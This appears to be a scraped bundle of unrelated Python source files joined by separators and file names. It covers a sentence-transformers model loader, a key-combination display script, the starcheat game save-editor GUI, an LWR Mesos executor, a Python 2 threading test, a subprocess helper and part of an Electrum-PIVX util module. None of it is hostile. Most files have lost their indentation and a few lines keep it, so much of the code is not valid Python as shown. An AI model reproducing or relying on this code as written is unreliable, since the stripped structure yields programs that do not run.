if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
other.py
|
import os
import threading
import time
FILE_PATH="./data/keys.lst"
last = ""
def keypress():
    s = ""
    for k in last.split("\n"):
        if k == "":
            continue
        s += k.title() + " + "
    print(s[:len(s) - 3])
    if "enter" in last:
        os.system("CLS")
while True:
    with open(FILE_PATH, "r") as f:
        d = f.readlines()
        if "".join(d) != last:
            last = "".join(d)
            thr = threading.Thread(target=keypress)
            thr.start()
    time.sleep(0.05)  # brief pause so the polling loop does not spin at 100% CPU
|
mainwindow.py
|
"""
Main application window for starcheat GUI
"""
import sys
import logging
import json
from PyQt5 import QtWidgets
from PyQt5 import QtCore
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtWidgets import QTableWidgetItem
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QAction
from PyQt5.QtWidgets import QProgressDialog
from PyQt5.QtWidgets import QColorDialog
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QPixmap
from PIL.ImageQt import ImageQt
from threading import Thread
import saves
import qt_mainwindow
from assets.core import Assets
from config import Config
from gui.common import ItemWidget
from gui.common import empty_slot
from gui.openplayer import CharacterSelectDialog
from gui.utils import OptionsDialog
from gui.utils import AboutDialog
from gui.utils import ModsDialog
from gui.utils import save_modified_dialog
from gui.utils import new_setup_dialog
from gui.utils import check_index_valid
from gui.utils import update_check_worker
from gui.utils import update_check_dialog
from gui.itemedit import ItemEdit
from gui.itemedit import ImageBrowser
from gui.itemedit import import_json
from gui.itemedit import ItemEditOptions
from gui.blueprints import BlueprintLib
from gui.itembrowser import ItemBrowser
from gui.appearance import Appearance
from gui.techs import Techs
from gui.quests import Quests
from gui.ship import Ship
class StarcheatMainWindow(QMainWindow):
"""Overrides closeEvent on the main window to allow "want to save changes?" dialog"""
def __init__(self, parent):
super(QMainWindow, self).__init__()
self.parent = parent
def closeEvent(self, event):
if not self.isWindowModified():
event.accept()
return
button = save_modified_dialog(self.parent.window)
if button == QMessageBox.Save:
self.parent.save()
event.accept()
elif button == QMessageBox.Cancel:
event.ignore()
elif button == QMessageBox.Discard:
event.accept()
class MainWindow():
def __init__(self):
        """Display the main starcheat window."""
        # check for new starcheat version online in separate thread
        update_result = [None]
        update_thread = Thread(target=update_check_worker, args=[update_result], daemon=True)
        update_thread.start()
self.app = QApplication(sys.argv)
self.window = StarcheatMainWindow(self)
self.ui = qt_mainwindow.Ui_MainWindow()
self.ui.setupUi(self.window)
logging.info("Main window init")
self.players = None
self.filename = None
self.item_browser = None
# remember the last selected item browser category
self.remember_browser = "<all>"
self.options_dialog = None
self.preview_armor = True
self.preview_bg = "#ffffff"
# connect action menu
self.ui.actionSave.triggered.connect(self.save)
self.ui.actionReload.triggered.connect(self.reload)
self.ui.actionOpen.triggered.connect(self.open_file)
self.ui.actionQuit.triggered.connect(self.app.closeAllWindows)
self.ui.actionOptions.triggered.connect(self.new_options_dialog)
self.ui.actionItemBrowser.triggered.connect(self.new_item_browser)
self.ui.actionAbout.triggered.connect(self.new_about_dialog)
self.ui.actionMods.triggered.connect(self.new_mods_dialog)
self.ui.actionImageBrowser.triggered.connect(self.new_image_browser_dialog)
self.ui.actionExportPlayerBinary.triggered.connect(self.export_save)
self.ui.actionExportPlayerJSON.triggered.connect(self.export_json)
self.ui.actionImportPlayerBinary.triggered.connect(self.import_save)
self.ui.actionImportPlayerJSON.triggered.connect(self.import_json)
# set up bag tables
bags = ("head", "chest", "legs", "back", "main_bag", "object_bag",
"tile_bag", "reagent_bag", "food_bag", "essentials", "mouse")
for bag in bags:
logging.debug("Setting up %s bag", bag)
self.bag_setup(getattr(self.ui, bag), bag)
self.preview_setup()
# signals
self.ui.blueprints_button.clicked.connect(self.new_blueprint_edit)
self.ui.appearance_button.clicked.connect(self.new_appearance_dialog)
self.ui.techs_button.clicked.connect(self.new_techs_dialog)
self.ui.quests_button.clicked.connect(self.new_quests_dialog)
self.ui.ship_button.clicked.connect(self.new_ship_dialog)
self.ui.name.textChanged.connect(self.set_name)
self.ui.male.clicked.connect(self.set_gender)
self.ui.female.clicked.connect(self.set_gender)
self.ui.pixels.valueChanged.connect(self.set_pixels)
self.ui.health.valueChanged.connect(lambda: self.set_stat_slider("health"))
self.ui.energy.valueChanged.connect(lambda: self.set_stat_slider("energy"))
self.ui.health_button.clicked.connect(lambda: self.max_stat("health"))
self.ui.energy_button.clicked.connect(lambda: self.max_stat("energy"))
self.ui.copy_uuid_button.clicked.connect(self.copy_uuid)
self.window.setWindowModified(False)
logging.debug("Showing main window")
self.window.show()
# launch first setup if we need to
if not new_setup_dialog(self.window):
logging.error("Config/index creation failed")
return
logging.info("Starbound folder: %s", Config().read("starbound_folder"))
logging.info("Checking assets hash")
if not check_index_valid(self.window):
logging.error("Index creation failed")
return
logging.info("Loading assets database")
self.assets = Assets(Config().read("assets_db"),
Config().read("starbound_folder"))
self.items = self.assets.items()
# populate species combobox
for species in self.assets.species().get_species_list():
self.ui.race.addItem(species)
self.ui.race.currentTextChanged.connect(self.update_species)
# populate game mode combobox
for mode in sorted(self.assets.player().mode_types.values()):
self.ui.game_mode.addItem(mode)
self.ui.game_mode.currentTextChanged.connect(self.set_game_mode)
# launch open file dialog
self.player = None
logging.debug("Open file dialog")
open_player = self.open_file()
# we *need* at least an initial save file
if not open_player:
logging.warning("No player file selected")
return
self.ui.name.setFocus()
# block for update check result (should be ready now)
update_thread.join()
if update_result[0]:
update_check_dialog(self.window, update_result[0])
sys.exit(self.app.exec_())
def update(self):
"""Update all GUI widgets with values from PlayerSave instance."""
logging.info("Updating main window")
# uuid / save version
self.ui.uuid_label.setText(self.player.get_uuid())
self.ui.ver_label.setText(self.player.get_header())
# name
self.ui.name.setText(self.player.get_name())
# race
self.ui.race.setCurrentText(self.player.get_race(pretty=True))
# pixels
try:
self.ui.pixels.setValue(self.player.get_pixels())
except TypeError:
logging.exception("Unable to set pixels widget")
# gender
getattr(self.ui, self.player.get_gender()).toggle()
# game mode
game_mode = self.player.get_game_mode()
try:
self.ui.game_mode.setCurrentText(self.assets.player().mode_types[game_mode])
except KeyError:
logging.exception("No game mode set on player")
# stats
self.update_stat("health")
self.update_stat("energy")
# quests
# TODO: re-enable when quests are supported again
# can_edit_quests = "quests" in self.player.entity
can_edit_quests = False
self.ui.quests_button.setEnabled(can_edit_quests)
# TODO: re-enable when techs work
self.ui.techs_button.setEnabled(False)
# ship
can_edit_ship = ("shipUpgrades" in self.player.entity and
"aiState" in self.player.entity)
self.ui.ship_button.setEnabled(can_edit_ship)
# items
total = 0
progress = QProgressDialog("Updating item slots...",
None, 0, 11, self.window)
progress.setWindowTitle("Updating...")
progress.setWindowModality(QtCore.Qt.ApplicationModal)
progress.forceShow()
progress.setValue(total)
# equipment
equip_bags = "head", "chest", "legs", "back"
for bag in equip_bags:
logging.debug("Updating %s", bag)
items = []
for x in getattr(self.player, "get_" + bag)():
if x is not None:
items.append(ItemWidget(x["content"], self.assets))
else:
items.append(ItemWidget(None, self.assets))
getattr(self.ui, bag).setItem(0, 0, items[0])
getattr(self.ui, bag).setItem(0, 1, items[1])
total += 1
progress.setValue(total)
for bag in "main_bag", "tile_bag", "object_bag", "reagent_bag", "food_bag", "essentials", "mouse":
self.update_bag(bag)
total += 1
progress.setValue(total)
self.update_player_preview()
def bag_setup(self, widget, name):
widget.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
# TODO: still issues with drag drop between tables
widget.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
widget.cellChanged.connect(self.set_edited)
item_edit = getattr(self, "new_" + name + "_item_edit")
widget.cellDoubleClicked.connect(lambda: item_edit(False))
sortable = ("main_bag", "tile_bag", "object_bag", "reagent_bag", "food_bag")
        clearable = ("essentials",)
edit_action = QAction("Edit...", widget)
edit_action.triggered.connect(lambda: item_edit(False))
widget.addAction(edit_action)
edit_json_action = QAction("Edit JSON...", widget)
edit_json_action.triggered.connect(lambda: item_edit(False, True))
widget.addAction(edit_json_action)
import_json = QAction("Import...", widget)
import_json.triggered.connect(lambda: item_edit(True))
widget.addAction(import_json)
trash_action = QAction("Trash", widget)
trash_slot = lambda: self.trash_slot(self.window, widget, True)
trash_action.triggered.connect(trash_slot)
widget.addAction(trash_action)
if name in sortable or name in clearable:
sep_action = QAction(widget)
sep_action.setSeparator(True)
widget.addAction(sep_action)
if name in clearable:
clear_action = QAction("Clear Held Items", widget)
clear_action.triggered.connect(self.clear_held_slots)
widget.addAction(clear_action)
if name in sortable:
sort_name = QAction("Sort By Name", widget)
sort_name.triggered.connect(lambda: self.sort_bag(name, "name"))
widget.addAction(sort_name)
sort_type = QAction("Sort By Type", widget)
sort_type.triggered.connect(lambda: self.sort_bag(name, "category"))
widget.addAction(sort_type)
sort_count = QAction("Sort By Count", widget)
sort_count.triggered.connect(lambda: self.sort_bag(name, "count"))
widget.addAction(sort_count)
def toggle_preview_armor(self):
self.preview_armor = not self.preview_armor
self.update_player_preview()
def change_preview_background(self):
qcolor = QColorDialog().getColor(QColor(self.preview_bg),
self.window)
if qcolor.isValid():
self.preview_bg = qcolor.name()
self.update_player_preview()
def preview_setup(self):
button = self.ui.preview_config_button
toggle_armor = QAction("Toggle Armor", button)
toggle_armor.triggered.connect(self.toggle_preview_armor)
button.addAction(toggle_armor)
change_bg = QAction("Change Background...", button)
change_bg.triggered.connect(self.change_preview_background)
button.addAction(change_bg)
def update_title(self):
"""Update window title with player name."""
self.window.setWindowTitle("Starcheat - " + self.player.get_name() + "[*]")
def save(self):
"""Update internal player dict with GUI values and export to file."""
logging.info("Saving player file %s", self.player.filename)
self.set_bags()
# save and show status
logging.info("Writing file to disk")
self.player.export_save(self.player.filename)
self.update_title()
self.ui.statusbar.showMessage("Saved " + self.player.filename, 3000)
self.window.setWindowModified(False)
self.players[self.player.get_uuid()] = self.player
def new_item_edit(self, bag, do_import, json_edit=False):
"""Display a new item edit dialog using the select cell in a given bag."""
logging.debug("New item edit dialog")
row = bag.currentRow()
column = bag.currentColumn()
current = bag.currentItem()
item = saves.empty_slot()
valid_slot = (type(current) is not QTableWidgetItem and
current is not None and
current.item is not None)
if do_import:
imported = import_json(self.window)
if imported is False:
self.ui.statusbar.showMessage("Error importing item, see starcheat log for details", 3000)
return
elif imported is None:
return
else:
item = imported
# cells don't retain ItemSlot widget when they've been dragged away
if valid_slot:
item.update(current.item)
if not json_edit:
item_edit = ItemEdit(self.window, item,
self.player, self.assets,
self.remember_browser)
else:
item_edit = ItemEditOptions(self.window,
item["name"],
item,
"Edit Item Data")
def update_slot():
logging.debug("Writing changes to slot")
try:
if not json_edit:
data = item_edit.get_item()
else:
name, data = item_edit.get_option()
new_slot = ItemWidget(data, self.assets)
if new_slot.item["name"] != "":
bag.setItem(row, column, new_slot)
if not json_edit:
self.remember_browser = item_edit.remember_browser
self.set_bags()
self.update_player_preview()
self.set_edited()
except (TypeError, KeyError):
logging.exception("Error updating item slot")
self.ui.statusbar.showMessage("Error updating item slot, see starcheat log for details", 3000)
item_edit.dialog.accepted.connect(update_slot)
if not json_edit:
trash_slot = lambda: self.trash_slot(item_edit.dialog, bag)
item_edit.ui.trash_button.clicked.connect(trash_slot)
got_item = item_edit.launch()
if got_item:
item_edit.dialog.exec()
else:
item_edit.dialog.exec()
def trash_slot(self, dialog, bag, standalone=False):
row = bag.currentRow()
column = bag.currentColumn()
ask_dialog = QMessageBox(dialog)
ask_dialog.setWindowTitle("Trash Item")
ask_dialog.setText("Are you sure?")
ask_dialog.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
ask_dialog.setDefaultButton(QMessageBox.No)
ask_dialog.setIcon(QMessageBox.Question)
if ask_dialog.exec() == QMessageBox.Yes:
bag.setItem(row, column, empty_slot())
if not standalone:
dialog.close()
self.set_bags()
self.update_player_preview()
self.set_edited()
def set_edited(self):
self.window.setWindowModified(True)
def sort_bag(self, bag_name, sort_by):
self.set_bags()
bag = getattr(self.player, "get_" + bag_name)()
sorted_bag = self.assets.player().sort_bag(bag, sort_by)
getattr(self.player, "set_" + bag_name)(sorted_bag)
self.ui.statusbar.showMessage("Sorting by " + sort_by + "...", 3000)
self.update()
self.ui.statusbar.clearMessage()
def clear_held_slots(self):
self.player.clear_held_slots()
self.set_edited()
self.ui.statusbar.showMessage("All held items have been cleared", 3000)
def new_blueprint_edit(self):
"""Launch a new blueprint management dialog."""
logging.debug("New blueprint dialog")
blueprint_lib = BlueprintLib(self.window,
self.player.get_blueprints(),
self.player.get_new_blueprints())
def update_blueprints():
logging.debug("Writing blueprints")
self.player.set_blueprints(blueprint_lib.get_known_list())
self.player.set_new_blueprints(blueprint_lib.new_blueprints)
blueprint_lib.dialog.close()
self.set_edited()
blueprint_lib.ui.buttonBox.rejected.connect(update_blueprints)
blueprint_lib.dialog.exec()
def copy_uuid(self):
clipboard = self.app.clipboard()
clipboard.setText(self.player.get_uuid())
self.ui.statusbar.showMessage("UUID copied to clipboard", 3000)
def new_item_browser(self):
"""Launch a standalone item browser dialog that does write any changes."""
self.item_browser = ItemBrowser(self.window, True)
self.item_browser.dialog.show()
def new_options_dialog(self):
"""Launch a new options config dialog."""
logging.debug("New options dialog")
self.options_dialog = OptionsDialog(self.window)
def write_options():
logging.info("Writing options to disk")
self.options_dialog.write()
self.update()
self.options_dialog.dialog.rejected.connect(write_options)
self.options_dialog.dialog.exec()
def new_about_dialog(self):
"""Launch a new about dialog."""
about_dialog = AboutDialog(self.window)
about_dialog.dialog.exec()
def new_appearance_dialog(self):
appearance_dialog = Appearance(self)
appearance_dialog.dialog.exec()
appearance_dialog.write_appearance_values()
self.update_player_preview()
def new_techs_dialog(self):
techs_dialog = Techs(self)
techs_dialog.dialog.rejected.connect(techs_dialog.write_techs)
techs_dialog.dialog.exec()
def new_quests_dialog(self):
quests_dialog = Quests(self)
quests_dialog.dialog.rejected.connect(quests_dialog.write_quests)
quests_dialog.dialog.exec()
def new_ship_dialog(self):
ship_dialog = Ship(self)
ship_dialog.dialog.rejected.connect(ship_dialog.write_ship)
ship_dialog.dialog.exec()
def new_mods_dialog(self):
mods_dialog = ModsDialog(self.window)
mods_dialog.dialog.exec()
def new_image_browser_dialog(self):
self.image_browser = ImageBrowser(self.window, self.assets)
self.image_browser.dialog.show()
def reload(self):
"""Reload the currently open save file and update GUI values."""
logging.info("Reloading file %s", self.player.filename)
self.player = saves.PlayerSave(self.player.filename)
self.update()
self.update_title()
self.ui.statusbar.showMessage("Reloaded " + self.player.filename, 3000)
self.window.setWindowModified(False)
def open_file(self):
"""Display open file dialog and load selected save."""
if self.window.isWindowModified():
button = save_modified_dialog(self.window)
if button == QMessageBox.Cancel:
return False
elif button == QMessageBox.Save:
self.save()
character_select = CharacterSelectDialog(self, self.assets)
character_select.show()
self.players = character_select.players
if character_select.selected is None:
logging.warning("No player selected")
return False
else:
self.player = character_select.selected
self.update()
self.update_title()
self.ui.statusbar.showMessage("Opened " + self.player.filename, 3000)
self.window.setWindowModified(False)
return True
# export save stuff
def export_save(self, kind="player"):
"""Save a copy of the current player file to another location.
Doesn't change the current filename."""
export_func = lambda: self.player.export_save(filename[0])
title = "Export Player File As"
filetype = "Player (*.player);;All Files (*)"
status = "Exported player file to "
filename = QFileDialog.getSaveFileName(self.window, title, filter=filetype)
if filename[0] != "":
self.set_bags()
export_func()
self.ui.statusbar.showMessage(status + filename[0], 3000)
def export_json(self, kind="player"):
"""Export player entity as json."""
data = self.player.entity
title = "Export Player JSON File As"
filetype = "JSON (*.json);;All Files (*)"
status = "Exported player JSON file to "
filename = QFileDialog.getSaveFileName(self.window, title, filter=filetype)
if filename[0] != "":
self.set_bags()
json_data = json.dumps(data, sort_keys=True,
indent=4, separators=(',', ': '))
json_file = open(filename[0], "w")
json_file.write(json_data)
json_file.close()
self.ui.statusbar.showMessage(status + filename[0], 3000)
# import save stuff
def import_save(self, kind="player"):
"""Import a .player file over the top of current player."""
import_func = self.player.import_save
title = "Import Player File"
filetype = "Player (*.player);;All Files (*)"
status = "Imported player file from "
filename = QFileDialog.getOpenFileName(self.window, title, filter=filetype)
if filename[0] == "":
return
try:
import_func(filename[0])
self.update()
self.ui.statusbar.showMessage(status + filename[0], 3000)
except:
logging.exception("Error reading file: %s", filename[0])
self.ui.statusbar.showMessage("Error reading file, see starcheat log for details", 3000)
def import_json(self, kind="player"):
"""Import an exported JSON file and merge/update with open player."""
update_func = lambda: self.player.entity.update(data)
title = "Import JSON Player File"
status = "Imported player file "
filename = QFileDialog.getOpenFileName(self.window, title,
filter="JSON (*.json);;All Files (*)")
if filename[0] == "":
logging.debug("No file selected to import")
return
try:
data = json.load(open(filename[0], "r"))
update_func()
self.update()
self.ui.statusbar.showMessage(status + filename[0], 3000)
except:
logging.exception("Error reading file: %s", filename[0])
self.ui.statusbar.showMessage("Error importing file, see starcheat log for details", 3000)
def get_gender(self):
if self.ui.male.isChecked():
return "male"
else:
return "female"
def get_bag(self, name):
"""Return the entire contents of a given non-equipment bag as raw values."""
logging.debug("Getting %s contents", name)
row = column = 0
bag = getattr(self.player, "get_" + name)()
for i in range(len(bag)):
item = getattr(self.ui, name).item(row, column)
empty_item = (item is None or
type(item) is QTableWidgetItem or
item.item is None)
if empty_item:
item = None
else:
widget = item.item
item = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
try:
bag[i] = item
except TypeError:
baglist = list(bag)
baglist[i] = item
del bag
bag = baglist
# so far all non-equip bags are 10 cols long
column += 1
if (column % 10) == 0:
row += 1
column = 0
return bag
def get_equip(self, name):
"""Return the raw values of both slots in a given equipment bag."""
logging.debug("Getting %s contents", name)
equip = getattr(self.ui, name)
main_cell = equip.item(0, 0)
glamor_cell = equip.item(0, 1)
# when you drag itemwidgets around the cell will become empty so just
# pretend it had an empty slot value
empty_main = (main_cell is None or
type(main_cell) is QTableWidgetItem or
main_cell.item is None)
if empty_main:
main = None
else:
widget = main_cell.item
main = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
empty_glamor = (glamor_cell is None or
type(glamor_cell) is QTableWidgetItem or
glamor_cell.item is None)
if empty_glamor:
glamor = None
else:
widget = glamor_cell.item
glamor = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
return main, glamor
def update_bag(self, bag_name):
"""Set the entire contents of any given bag with ItemWidgets based off player data."""
logging.debug("Updating %s contents", bag_name)
row = column = 0
bag = getattr(self.player, "get_" + bag_name)()
for slot in range(len(bag)):
item = bag[slot]
if item is not None and "content" in item:
widget = ItemWidget(item["content"], self.assets)
else:
widget = ItemWidget(None, self.assets)
getattr(self.ui, bag_name).setItem(row, column, widget)
column += 1
if (column % 10) == 0:
row += 1
column = 0
def update_player_preview(self):
try:
image = self.assets.species().render_player(self.player,
self.preview_armor)
pixmap = QPixmap.fromImage(ImageQt(image))
except (OSError, TypeError, AttributeError):
# TODO: more specific error handling. may as well except all errors
# at this point jeez
logging.exception("Couldn't load species images")
pixmap = QPixmap()
self.ui.player_preview.setStyleSheet("background-color: %s;" % self.preview_bg)
self.ui.player_preview.setPixmap(pixmap)
self.window.setWindowModified(True)
def update_species(self):
species = self.ui.race.currentText()
if self.player.get_race(pretty=True) == species:
# don't overwrite appearance values if it didn't really change
return
self.player.set_race(species)
defaults = self.assets.species().get_default_colors(species)
for key in defaults:
getattr(self.player, "set_%s_directives" % key)(defaults[key][0])
self.update_player_preview()
self.window.setWindowModified(True)
def set_pixels(self):
self.player.set_pixels(self.ui.pixels.value())
self.set_edited()
def set_name(self):
self.player.set_name(self.ui.name.text())
self.set_edited()
def set_gender(self):
self.player.set_gender(self.get_gender())
self.update_player_preview()
self.set_edited()
def set_game_mode(self):
self.player.set_game_mode(self.assets.player().get_mode_type(self.ui.game_mode.currentText()))
self.set_edited()
def set_bags(self):
        # this function mostly just exists to work around the bug of
        # drag-and-drop not updating the player entity; it reads the values
        # back out of the table views
# equipment
equip_bags = "head", "chest", "legs", "back"
for b in equip_bags:
bag = self.get_equip(b)
getattr(self.player, "set_" + b)(bag[0], bag[1])
# bags
bags = "main_bag", "tile_bag", "essentials", "mouse", "object_bag", "reagent_bag", "food_bag"
for b in bags:
getattr(self.player, "set_" + b)(self.get_bag(b))
def max_stat(self, name):
"""Set a stat's current value to its max value."""
getattr(self.player, "set_"+name)(100)
self.update_stat(name)
def set_stat(self, name):
max = getattr(self.ui, "max_"+name).value()
getattr(self.player, "set_max_"+name)(float(max))
self.update_stat(name)
def set_stat_slider(self, name):
current = getattr(self.ui, name).value()
getattr(self.player, "set_"+name)(current)
self.update_stat(name)
def update_stat(self, name):
try:
current = int(getattr(self.player, "get_"+name)())
button = getattr(self.ui, name+"_button")
getattr(self.ui, name).setValue(current)
button.setEnabled(current != 100)
self.set_edited()
except TypeError:
logging.exception("Unable to set stat %s", name)
# these are used for connecting the item edit dialog to bag tables
def new_main_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.main_bag, do_import, json_edit)
def new_tile_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.tile_bag, do_import, json_edit)
def new_object_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.object_bag, do_import, json_edit)
def new_reagent_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.reagent_bag, do_import, json_edit)
def new_food_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.food_bag, do_import, json_edit)
def new_head_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.head, do_import, json_edit)
def new_chest_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.chest, do_import, json_edit)
def new_legs_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.legs, do_import, json_edit)
def new_back_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.back, do_import, json_edit)
def new_essentials_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.essentials, do_import, json_edit)
def new_mouse_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.mouse, do_import, json_edit)
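# --- Hedged usage sketch (not part of the original module) ---
# starcheat normally constructs MainWindow() from its launcher script; the
# constructor builds the Qt application, shows the window and runs the event
# loop itself, so a minimal entry point (assuming the imports above resolve) is:
if __name__ == "__main__":
    MainWindow()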
|
mesos_executor.py
|
import sys
import threading
from lwr.mesos import (
Executor,
MesosExecutorDriver,
mesos_pb2,
ensure_mesos_libs,
)
from lwr.lwr_client.util import from_base64_json
from lwr.scripts.lwr_submit import (
manager_from_args,
wait_for_job
)
from lwr.manager_endpoint_util import submit_job
from lwr.daemon import (
ArgumentParser,
LwrManagerConfigBuilder,
)
import logging
log = logging.getLogger(__name__)
DESCRIPTION = "Mesos executor for the LWR"
class LwrExecutor(Executor):
def __task_update(self, driver, task, state, data=None):
try:
log.debug("Sending status update...")
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = state
if data:
update.data = data
driver.sendStatusUpdate(update)
except Exception:
log.exception("Failed to update status of task.")
def launchTask(self, driver, task):
# Create a thread to run the task. Tasks should always be run in new
# threads or processes, rather than inside launchTask itself.
def run_task():
try:
log.info("Running task %s" % task.task_id.value)
task_data = from_base64_json(task.data)
manager_options = task_data["manager"]
config_builder = LwrManagerConfigBuilder(**manager_options)
manager, lwr_app = manager_from_args(config_builder)
job_config = task_data["job"]
submit_job(manager, job_config)
self.__task_update(driver, task, mesos_pb2.TASK_RUNNING)
wait_for_job(manager, job_config)
self.__task_update(driver, task, mesos_pb2.TASK_FINISHED)
lwr_app.shutdown()
except Exception:
log.exception("Failed to run, update, or monitor task %s" % task)
raise
thread = threading.Thread(target=run_task)
thread.start()
def frameworkMessage(self, driver, message):
# Send it back to the scheduler.
driver.sendFrameworkMessage(message)
def run_executor():
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.parse_args()
ensure_mesos_libs()
log.info("Starting LWR executor")
driver = MesosExecutorDriver(LwrExecutor())
exit_code = 0
    if driver.run() != mesos_pb2.DRIVER_STOPPED:
exit_code = 1
return exit_code
if __name__ == "__main__":
sys.exit(run_executor())
|
t_threading2.py
|
#!/usr/bin/env python
#coding:utf-8
# Author:
# Purpose:
# Created: 2013-03-27
import threading
import time
def worker(i=1):
print "test:",i
time.sleep(2)
print 'after'
for i in xrange(5):
t = threading.Thread(target=worker,args=[2])
t.start()
time.sleep(5)
print "current has %d threads" % (threading.activeCount() - 1)
|
ext_subprocess.py
|
import subprocess
import sys
import threading
def run_command_stream_output(cmd: str):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
_stream_output_from_process(process)
def run_command_in_background_stream_output(cmd: str):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output_thread = threading.Thread(
target=_stream_output_from_process, args=(process,), daemon=True
)
output_thread.start()
def _stream_output_from_process(process: subprocess.Popen):
for line in iter(process.stdout.readline, b""): # type: ignore
sys.stdout.write(line.decode("utf-8"))
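# --- Hedged usage sketch (not part of the original module) ---
# The shell commands below are placeholders. The foreground helper blocks until
# the command's stdout is exhausted; the background helper returns immediately
# while a daemon thread echoes the output.
if __name__ == "__main__":
    import time
    run_command_stream_output("echo foreground")
    run_command_in_background_stream_output("echo background")
    time.sleep(0.5)  # give the daemon thread a moment to flush before exiting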
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Electrum-PIVX - lightweight PIVX client
# Copyright (C) 2018 random.zebra
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Raise this exception to unwind the stack, as when an error occurs.
# However, unlike other exceptions, the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
